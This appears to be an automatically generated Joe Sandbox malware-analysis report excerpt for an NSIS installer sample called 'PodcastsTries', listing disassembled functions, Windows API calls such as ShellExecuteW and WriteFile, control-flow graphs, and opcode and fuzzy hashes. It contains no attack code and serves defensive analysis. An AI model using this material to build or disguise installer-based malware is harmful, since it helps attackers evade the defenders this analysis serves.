                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                          • String ID: Exch: stack < %d elements$GrassConnectorTransThehun$Pop: stack empty
                                                                                                                                                                                                                                                                                                          • API String ID: 1459762280-201286362
                                                                                                                                                                                                                                                                                                          • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                          • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                                                                                                                                                                          Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                          • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNELBASE(007BC958), ref: 00402387
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                          • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                          Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                          • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                          Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                          • String ID: <RM>$GrassConnectorTransThehun$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                          • API String ID: 247603264-2339468215
                                                                                                                                                                                                                                                                                                          • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                          • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                                          Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                          • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                                                          • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                                                          Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                          • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                                                          Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: HideWindow
                                                                                                                                                                                                                                                                                                          • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                          • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                                                          Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                                                          Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
